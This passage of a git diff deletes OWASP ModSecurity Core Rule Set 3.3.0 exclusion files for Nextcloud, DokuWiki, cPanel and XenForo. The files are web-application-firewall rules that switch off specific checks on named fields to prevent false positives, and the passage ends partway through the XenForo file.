- -SecRule REQUEST_FILENAME "@contains /index.php/apps/files_texteditor/" \ - "id:9003310,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:filecontents,\ - ctl:ruleRemoveTargetById=921110-921160;ARGS:filecontents,\ - ctl:ruleRemoveTargetById=932150;ARGS:filename,\ - ctl:ruleRemoveTargetById=920370-920390;ARGS:filecontents,\ - ctl:ruleRemoveTargetById=920370-920390;ARGS_COMBINED_SIZE,\ - ver:'OWASP_CRS/3.3.0'" - - -# [ Address Book ] -# -# Allow the data type 'text/vcard' - -SecRule REQUEST_FILENAME "@contains /remote.php/dav/addressbooks/" \ - "id:9003320,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |text/vcard|'" - -# Allow modifying contacts via the web interface -SecRule REQUEST_METHOD "@streq PUT" \ - "id:9003321,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - chain" - SecRule REQUEST_FILENAME "@contains /remote.php/dav/addressbooks/" \ - "t:none,\ - ctl:ruleRemoveById=200002" - - -# [ Calendar ] -# -# Allow the data type 'text/calendar' - -SecRule REQUEST_FILENAME "@contains /remote.php/dav/calendars/" \ - "id:9003330,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |text/calendar|'" - -# Allow modifying calendar events via the web interface -SecRule REQUEST_METHOD "@streq PUT" \ - "id:9003331,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - chain" - SecRule REQUEST_FILENAME "@contains /remote.php/dav/calendars/" \ - "t:none,\ - ctl:ruleRemoveById=200002" - - -# [ Notes ] -# -# We want to allow a lot of things as the user is -# allowed to note on anything. - -SecRule REQUEST_FILENAME "@contains /index.php/apps/notes/" \ - "id:9003340,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveByTag=attack-injection-php,\ - ver:'OWASP_CRS/3.3.0'" - - -# [ Bookmarks ] -# -# Allow urls in data. 
- -SecRule REQUEST_FILENAME "@contains /index.php/apps/bookmarks/" \ - "id:9003350,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveById=931130,\ - ver:'OWASP_CRS/3.3.0'" - - -# -# [ Login forms ] -# - -# This removes checks on the 'password' and related fields: - -# User login password. - -SecRule REQUEST_FILENAME "@contains /index.php/login" \ - "id:9003400,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=941100;ARGS:requesttoken,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:password,\ - ver:'OWASP_CRS/3.3.0'" - -# Reset password. - -SecRule REQUEST_FILENAME "@endsWith /index.php/login" \ - "id:9003410,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:action "@streq resetpass" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2" - -# Change Password and Setting up a new user/password - -SecRule REQUEST_FILENAME "@endsWith /index.php/settings/users" \ - "id:9003500,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:newuserpassword,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:password,\ - ver:'OWASP_CRS/3.3.0'" - - -SecMarker "END-NEXTCLOUD-ADMIN" - -SecMarker "END-NEXTCLOUD" diff --git a/rules/REQUEST-903.9004-DOKUWIKI-EXCLUSION-RULES.conf b/rules/REQUEST-903.9004-DOKUWIKI-EXCLUSION-RULES.conf deleted file mode 100644 index 71738c259e..0000000000 --- a/rules/REQUEST-903.9004-DOKUWIKI-EXCLUSION-RULES.conf +++ /dev/null 
@@ -1,272 +0,0 @@ -# ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 -# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. -# -# The OWASP ModSecurity Core Rule Set is distributed under -# Apache Software License (ASL) version 2 -# Please see the enclosed LICENSE file for full details. -# -# ------------------------------------------------------------------------ - -# These exclusions remedy false positives in a default Dokuwiki install. -# The exclusions are only active if crs_exclusions_dokuwiki=1 is set. -# See rule 900130 in crs-setup.conf.example for instructions. -# -# Note, if you want to relax the upload restrictions, -# see rule 900240. For Dokuwiki you can limit the exception -# to the ajax.php file: -# -# SecRule REQUEST_FILENAME "@endsWith /lib/exe/ajax.php" ... -# - - -SecRule &TX:crs_exclusions_dokuwiki|TX:crs_exclusions_dokuwiki "@eq 0" \ - "id:9004000,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-DOKUWIKI" - -SecRule &TX:crs_exclusions_dokuwiki|TX:crs_exclusions_dokuwiki "@eq 0" \ - "id:9004001,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-DOKUWIKI" - - -# -# -=[ Dokuwiki Front-End ]=- -# -# Note on files specified: -# /doku.php: shows pages, saves, edits, admin -# /lib/exe/ajax.php: autosave, uploads -# -# Allow pages to be edited, and ajax to save drafts. -# -# ARGS 'wikitext', 'suffix', and 'prefix' must allow the same things, -# as the page (in part or whole) is passed via 'suffix/prefix' at times. -# attack-protocol (921110-921160/920230): Allows odd characters on the page. -# CRS: (still need attack-protocol specified.) -# attack-injection-php (930000-933999): Allows code on page. -# attack-sqli (940000-942999): Allows SQL expressions on page. -# -# Others: -# 930100-930110;REQUEST_BODY: if there's a /../ in the text. 
-# -# ARGS:summary (the text in the 'summary' box on page edits.): -# Allowing 930120-930130 lets user save summaries with -# system file names. This should not be needed in normal -# use. But leaving a note here of how to allow in rule below: -# ctl:ruleRemoveTargetById=930120;ARGS:summary -# ctl:ruleRemoveTargetById=930130;ARGS:summary -# -# Also, can't specify: -# SecRule ARGS:do "@streq edit" \ -# SecRule REQUEST_FILENAME "@endsWith /lib/exe/ajax.php"\ -# because at times the do=edit can get dropped, so if we use -# above the edit will get blocked when the page is saved. - -# Hint: those using .htaccess rewrites can remove/replace -# this first 'SecRule...' line with 'SecAction \' (unsupported). - -SecRule REQUEST_FILENAME "@rx (?:/doku.php|/lib/exe/ajax.php)$" \ - "id:9004100,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule REQUEST_METHOD "@streq POST" \ - "t:none,\ - chain" - SecRule REQUEST_COOKIES:/S?DW[a-f0-9]+/ "@rx ^[%a-zA-Z0-9_-]+" \ - "t:none,\ - ctl:ruleRemoveTargetByTag=attack-protocol;ARGS:wikitext,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:wikitext,\ - ctl:ruleRemoveTargetByTag=attack-protocol;ARGS:suffix,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:suffix,\ - ctl:ruleRemoveTargetByTag=attack-protocol;ARGS:prefix,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:prefix,\ - ctl:ruleRemoveTargetById=930100-930110;REQUEST_BODY" - - -# Allow it to upload files. But check for cookies just to make sure. - -SecRule REQUEST_FILENAME "@endsWith /lib/exe/ajax.php" \ - "id:9004110,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - noauditlog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule REQUEST_METHOD "@streq POST" \ - "t:none,\ - chain" - SecRule REQUEST_COOKIES:/S?DW[a-f0-9]+/ "@rx ^[%a-zA-Z0-9_-]+" \ - "t:none,\ - setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type}|application/octet-stream'" - - -# Show the index, even if things like "postgresql" or other things show up. 
- -SecRule REQUEST_FILENAME "@endsWith /doku.php" \ - "id:9004130,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - noauditlog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:do "@streq index" \ - "t:none,\ - chain" - SecRule &ARGS:do "@eq 1" \ - "t:none,\ - ctl:ruleRemoveById=951240,\ - ctl:ruleRemoveById=953110" - - -# -# [ Login form ] -# - -# Turn off checks for password. - -SecRule REQUEST_FILENAME "@endsWith /doku.php" \ - "id:9004200,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - noauditlog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:do "@streq login" \ - "t:none,\ - chain" - SecRule &ARGS:do "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:p" - - -# -# [ Admin Area ] -# -# Skip this section for performance unless do=admin is in request - -SecRule ARGS:do "!@streq admin" \ - "id:9004300,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-DOKUWIKI-ADMIN" - -SecRule ARGS:do "!@streq admin" \ - "id:9004310,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-DOKUWIKI-ADMIN" - - -# [ Reset password ] -# -# Turn off checks for pass1, pass1-text, pass2 - -SecRule REQUEST_FILENAME "@endsWith /doku.php" \ - "id:9004320,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - noauditlog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:do "@streq login" \ - "t:none,\ - chain" - SecRule &ARGS:do "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2" - - -# [ Save config ] -# -# Allow the config to be saved: -# 942200: If the user adds "..." 
to tagline: ARGS:config[tagline] -# 942430: if ARGS:config[hidepages] has pages looking like sql statements -# 942430,942440: "--- //[[@MAIL@|@NAME@]] @DATE@//"]" in ARGS:config[signature] - -SecRule REQUEST_FILENAME "@endsWith /doku.php" \ - "id:9004370,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - noauditlog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:page "@streq config" \ - "t:none,\ - chain" - SecRule &ARGS:page "@eq 1" \ - "t:none,\ - chain" - SecRule REQUEST_METHOD "@streq POST" \ - "t:none,\ - chain" - SecRule REQUEST_COOKIES:/S?DW[a-f0-9]+/ "@rx ^[%a-zA-Z0-9_-]+" \ - "t:none,\ - ctl:ruleRemoveTargetById=920230;ARGS:config[dformat],\ - ctl:ruleRemoveTargetById=942200;ARGS:config[tagline],\ - ctl:ruleRemoveTargetById=942430;ARGS:config[hidepages],\ - ctl:ruleRemoveTargetById=942430-942440;ARGS:config[signature]" - - -# When the config loads after a save, it gets blocked because -# it has 'readdir' and lines that look like sql -# 942430,942440: "--- //[[@MAIL@|@NAME@]] @DATE@//"]" in ARGS:config[signature] -# 951240,953110: When the page reloads, it triggers -# postgres and php code disclosure rules. - -SecRule REQUEST_FILENAME "@endsWith /doku.php" \ - "id:9004380,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - noauditlog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:page "@streq config" \ - "t:none,\ - chain" - SecRule &ARGS:page "@eq 1" \ - "t:none,\ - chain" - SecRule REQUEST_COOKIES:/S?DW[a-f0-9]+/ "@rx ^[%a-zA-Z0-9_-]+" \ - "t:none,\ - ctl:ruleRemoveById=951240,\ - ctl:ruleRemoveById=953110" - - -# End [ Admin Area ] - -SecMarker "END-DOKUWIKI-ADMIN" - -SecMarker "END-DOKUWIKI" diff --git a/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf b/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf deleted file mode 100644 index a92d8093cb..0000000000 --- a/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf +++ /dev/null 
@@ -1,63 +0,0 @@ -# ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 -# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. -# -# The OWASP ModSecurity Core Rule Set is distributed under -# Apache Software License (ASL) version 2 -# Please see the enclosed LICENSE file for full details. -# ------------------------------------------------------------------------ - -# These exclusions remedy false positives in a default cPanel environment. -# The exclusions are only active if crs_exclusions_cpanel=1 is set. -# See rule 900130 in crs-setup.conf.example for instructions. - - -SecRule &TX:crs_exclusions_cpanel|TX:crs_exclusions_cpanel "@eq 0" \ - "id:9005000,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-CPANEL" - -SecRule &TX:crs_exclusions_cpanel|TX:crs_exclusions_cpanel "@eq 0" \ - "id:9005001,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-CPANEL" - - -# -# [ cPanel whm-server-status ] -# -# Cpanel's WHM auto generates requests to /whm-server-status from -# 127.0.0.1 (triggers rule 920280, non-blocking, log only) Once every 5 minutes. -# These false positives have a low impact (logged, non-blocking) to a large number of users (all cPanel admins). -# - -# -# Rule to allow cPanel whm-server-status requests from localhost without log entry. -# -SecRule REQUEST_LINE "@rx ^GET /whm-server-status(?:/|/\?auto)? HTTP/[12]\.[01]$" \ - "id:9005100,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-apache',\ - tag:'attack-generic',\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \ - "t:none,\ - ctl:ruleRemoveById=920280,\ - ctl:ruleRemoveById=920350" - - -SecMarker "END-CPANEL" 
diff --git a/rules/REQUEST-903.9006-XENFORO-EXCLUSION-RULES.conf b/rules/REQUEST-903.9006-XENFORO-EXCLUSION-RULES.conf deleted file mode 100644 index 7474d53ad3..0000000000 --- a/rules/REQUEST-903.9006-XENFORO-EXCLUSION-RULES.conf +++ /dev/null 
@@ -1,586 +0,0 @@ -# ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 -# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. -# -# The OWASP ModSecurity Core Rule Set is distributed under -# Apache Software License (ASL) version 2 -# Please see the enclosed LICENSE file for full details. -# ------------------------------------------------------------------------ - -# These exclusions remedy false positives in a default XenForo install. -# The exclusions are only active if crs_exclusions_xenforo=1 is set. -# See rule 900130 in crs-setup.conf.example for instructions. - -SecRule &TX:crs_exclusions_xenforo|TX:crs_exclusions_xenforo "@eq 0" \ - "id:9006000,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-XENFORO" - -SecRule &TX:crs_exclusions_xenforo|TX:crs_exclusions_xenforo "@eq 0" \ - "id:9006001,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-XENFORO" - - -# -# -=[ XenForo Front-End ]=- -# - -# Proxy for images and remote content embedded in forum posts -# GET /xf/proxy.php?image=https://example.com/some.jpg&hash=foo -# GET /xf/proxy.php?link=https://example.com&hash=foo -# POST /xf/proxy.php, body: referrer=... 
-SecRule REQUEST_FILENAME "@endsWith /proxy.php" \ - "id:9006100,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:image,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:link,\ - ctl:ruleRemoveTargetById=931130;ARGS:referrer,\ - ctl:ruleRemoveTargetById=942230;ARGS:referrer,\ - ver:'OWASP_CRS/3.3.0'" - -# Store drafts for private message, forum post, thread reply -# POST /xf/conversations/draft -# POST /xf/conversations/convo-title.12345/draft -# POST /xf/forums/forum-title.12345/draft -# POST /xf/threads/thread-title-%E2%98%85.12345/draft -# -# attachment_hash_combined example: -# {"type":"post","context":{"post_id":12345},"hash":"0123456789abcdef..."} -SecRule REQUEST_FILENAME "@rx /(?:conversations|(?:conversations|forums|threads)/.*)/draft$" \ - "id:9006110,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=931130;ARGS:href,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:title,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message_html,\ - ctl:ruleRemoveTargetById=942200;ARGS:attachment_hash_combined,\ - ctl:ruleRemoveTargetById=942260;ARGS:attachment_hash_combined,\ - ctl:ruleRemoveTargetById=942340;ARGS:attachment_hash_combined,\ - ctl:ruleRemoveTargetById=942370;ARGS:attachment_hash_combined,\ - ver:'OWASP_CRS/3.3.0'" - -# Send PM, edit post, create thread, reply to thread -# POST /xf/conversations/add -# POST /xf/conversations/add-preview -# POST /xf/conversations/messages/1463947/edit -# POST /xf/posts/12345/edit -# POST /xf/posts/12345/preview -# POST /xf/conversations/convo-title.12345/add-reply -# POST /xf/threads/thread-title.12345/add-reply -# POST /xf/threads/thread-title.12345/reply-preview -# POST /xf/forums/forum-title.12345/post-thread -# POST /xf/forums/blogs/post-thread -# POST /xf/forums/forum-title.12345/thread-preview -SecRule REQUEST_FILENAME "@rx 
/(?:conversations/add(?:-preview)?|conversations/messages/\d+/edit|posts/\d+/(?:edit|preview)|(?:conversations|threads)/.*\.\d+/(?:add-reply|reply-preview)|forums/.*/(?:post-thread|thread-preview))$" \ - "id:9006120,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:title,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message_html,\ - ctl:ruleRemoveTargetById=942200;ARGS:attachment_hash_combined,\ - ctl:ruleRemoveTargetById=942260;ARGS:attachment_hash_combined,\ - ctl:ruleRemoveTargetById=942340;ARGS:attachment_hash_combined,\ - ctl:ruleRemoveTargetById=942370;ARGS:attachment_hash_combined,\ - ver:'OWASP_CRS/3.3.0'" - -# Quote -# POST /xf/posts/12345/quote -SecRule REQUEST_FILENAME "@rx /posts/\d+/quote$" \ - "id:9006130,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:quoteHtml,\ - ver:'OWASP_CRS/3.3.0'" - -# Multi quote -# POST /xf/conversations/convo-title.12345/multi-quote -# POST /xf/threads/thread-title.12345/multi-quote -# quotes={"12345":["quote-html"]} -SecRule REQUEST_FILENAME "@rx /(?:conversations|threads)/.*\.\d+/multi-quote$" \ - "id:9006140,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:quotes,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[0][value],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[1][value],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[2][value],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[3][value],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[4][value],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[5][value],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[6][value],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[7][value],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[8][value],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[9][value],\ - ver:'OWASP_CRS/3.3.0'" - -# Delete thread -# POST 
/xf/threads/thread-title.12345/delete -SecRule REQUEST_FILENAME "@rx /threads/.*\.\d+/delete$" \ - "id:9006150,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=942130;ARGS:starter_alert_reason,\ - ver:'OWASP_CRS/3.3.0'" - -# Feature thread -# POST /xf/threads/thread-title.12345/feature-edit -SecRule REQUEST_FILENAME "@rx /threads/.*\.\d+/feature-edit$" \ - "id:9006155,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:feature[feature_excerpt]" - -# Inline moderate thread -# POST /xf/inline-mod/ -SecRule REQUEST_FILENAME "@endsWith /inline-mod/" \ - "id:9006160,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:author_alert_reason,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ - ver:'OWASP_CRS/3.3.0'" - -# Warn member -# POST /xf/members/name.12345/warn -# POST /xf/posts/12345/warn -SecRule REQUEST_FILENAME "@rx /(?:members/.*\.\d+|posts/\d+)/warn$" \ - "id:9006170,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:conversation_message,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:notes,\ - ver:'OWASP_CRS/3.3.0'" - -# Editor -SecRule REQUEST_URI "@endsWith /index.php?editor/to-html" \ - "id:9006200,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:bb_code,\ - ctl:ruleRemoveTargetById=942200;ARGS:attachment_hash_combined,\ - ctl:ruleRemoveTargetById=942260;ARGS:attachment_hash_combined,\ - ctl:ruleRemoveTargetById=942340;ARGS:attachment_hash_combined,\ - ctl:ruleRemoveTargetById=942370;ARGS:attachment_hash_combined,\ - ver:'OWASP_CRS/3.3.0'" - -# Editor -SecRule REQUEST_URI "@endsWith /index.php?editor/to-bb-code" \ - "id:9006210,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:html,\ - ver:'OWASP_CRS/3.3.0'" - -# Post attachment -# POST /xf/account/avatar -# POST /xf/attachments/upload?type=post&context[thread_id]=12345&hash=foo -SecRule REQUEST_FILENAME 
"@rx /(?:account/avatar|attachments/upload)$" \ - "id:9006220,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveById=200003,\ - ctl:ruleRemoveTargetById=942220;ARGS:flowChunkSize,\ - ctl:ruleRemoveTargetById=942440;ARGS:flowIdentifier,\ - ctl:ruleRemoveTargetById=942440;ARGS:flowFilename,\ - ctl:ruleRemoveTargetById=942440;ARGS:flowRelativePath,\ - ver:'OWASP_CRS/3.3.0'" - -# Media -# POST /xf/index.php?editor/media -SecRule REQUEST_URI "@endsWith /index.php?editor/media" \ - "id:9006230,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=931130;ARGS:url,\ - ctl:ruleRemoveTargetById=942130;ARGS:url,\ - ver:'OWASP_CRS/3.3.0'" - -# Emoji -# GET /xf/index.php?misc/find-emoji&q=(%0A%0A -SecRule REQUEST_URI "@rx /index\.php\?misc/find-emoji&q=" \ - "id:9006240,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=921151;ARGS:q,\ - ver:'OWASP_CRS/3.3.0'" - -# Login -# POST /xf/login/login -SecRule REQUEST_FILENAME "@endsWith /login/login" \ - "id:9006300,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:password,\ - ver:'OWASP_CRS/3.3.0'" - -# Register account -# POST /xf/register/register -# The password is passed in a variable-name form parameter. We don't -# want to exclude all parameters completely as this would cause an -# unacceptable bypass. So, we exclude only commonly hit rules. 
-SecRule REQUEST_FILENAME "@endsWith /register/register" \ - "id:9006310,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=942130;ARGS,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:reg_key,\ - ver:'OWASP_CRS/3.3.0'" - -# Confirm account -# GET /xf/account-confirmation/name.12345/email?c=foo -SecRule REQUEST_FILENAME "@rx /account-confirmation/.*\.\d+/email$" \ - "id:9006315,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:c" - -# Edit account -# POST /xf/account/account-details -SecRule REQUEST_FILENAME "@endsWith /account/account-details" \ - "id:9006320,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=931130;ARGS:custom_fields[picture],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:about_html,\ - ver:'OWASP_CRS/3.3.0'" - -# Lost password -# POST /xf/lost-password/user-name.12345/confirm?c=foo -SecRule REQUEST_FILENAME "@rx /lost-password/.*\.\d+/confirm$" \ - "id:9006330,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:c,\ - ver:'OWASP_CRS/3.3.0'" - -# Set forum signature -# POST /xf/account/signature -SecRule REQUEST_FILENAME "@endsWith /account/signature" \ - "id:9006340,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:signature_html,\ - ver:'OWASP_CRS/3.3.0'" - -# Search -# POST /xf/search/search -SecRule REQUEST_FILENAME "@endsWith /search/search" \ - "id:9006400,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:keywords,\ - ctl:ruleRemoveTargetById=942200;ARGS:constraints,\ - ctl:ruleRemoveTargetById=942260;ARGS:constraints,\ - ctl:ruleRemoveTargetById=942340;ARGS:constraints,\ - ctl:ruleRemoveTargetById=942370;ARGS:constraints,\ - ver:'OWASP_CRS/3.3.0'" - -# Search within thread -# GET /xf/threads/foo.12345/page12?highlight=foo -SecRule REQUEST_FILENAME "@rx /threads/.*\.\d+/(?:page\d+)?$" \ - "id:9006410,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - 
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:highlight,\ - ver:'OWASP_CRS/3.3.0'" - -# Search within search result -# GET /xf/search/12345/?q=foo -SecRule REQUEST_FILENAME "@rx /search/\d+/$" \ - "id:9006420,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:q,\ - ver:'OWASP_CRS/3.3.0'" - -# Contact form -# POST /xf/misc/contact -SecRule REQUEST_FILENAME "@endsWith /misc/contact" \ - "id:9006500,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:subject,\ - ver:'OWASP_CRS/3.3.0'" - -# Report post -# POST /xf/posts/12345/report -SecRule REQUEST_FILENAME "@rx /posts/\d+/report$" \ - "id:9006510,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ - ver:'OWASP_CRS/3.3.0'" - -# Alternate thread view route -# /xf/index.php?threads/title-having-some-sql.12345/ -# -# Especially threads with the HAVING sql keyword are FP prone. -# This rule has some chains to narrow down the exclusion, -# making it harder for an attacker to abuse the ARGS_NAMES -# exclusion on other endpoints. 
-SecRule REQUEST_FILENAME "@endsWith /index.php" \ - "id:9006600,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule REQUEST_METHOD "@streq GET" \ - "t:none,\ - chain" - SecRule &ARGS "@eq 1" \ - "t:none,\ - chain" - SecRule REQUEST_URI "@rx /index\.php\?threads/.*\.\d+/$" \ - "t:none,\ - ctl:ruleRemoveTargetById=942100;ARGS_NAMES,\ - ctl:ruleRemoveTargetById=942230;ARGS_NAMES" - -# Browser fingerprint (DBTech security extension) -# May Contain various javascript/XSS false positives -SecRule REQUEST_URI "@endsWith /index.php?dbtech-security/fingerprint" \ - "id:9006700,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:components[14][value],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:components[15][value],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:components[16][value],\ - ver:'OWASP_CRS/3.3.0'" - -# Get location info -SecRule REQUEST_FILENAME "@endsWith /misc/location-info" \ - "id:9006710,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:location,\ - ver:'OWASP_CRS/3.3.0'" - -# -# -=[ XenForo Global Exclusions ]=- -# - -# _xfRedirect, _xfRequestUri can appear on various endpoints. -# Cookies can appear on all endpoints. 
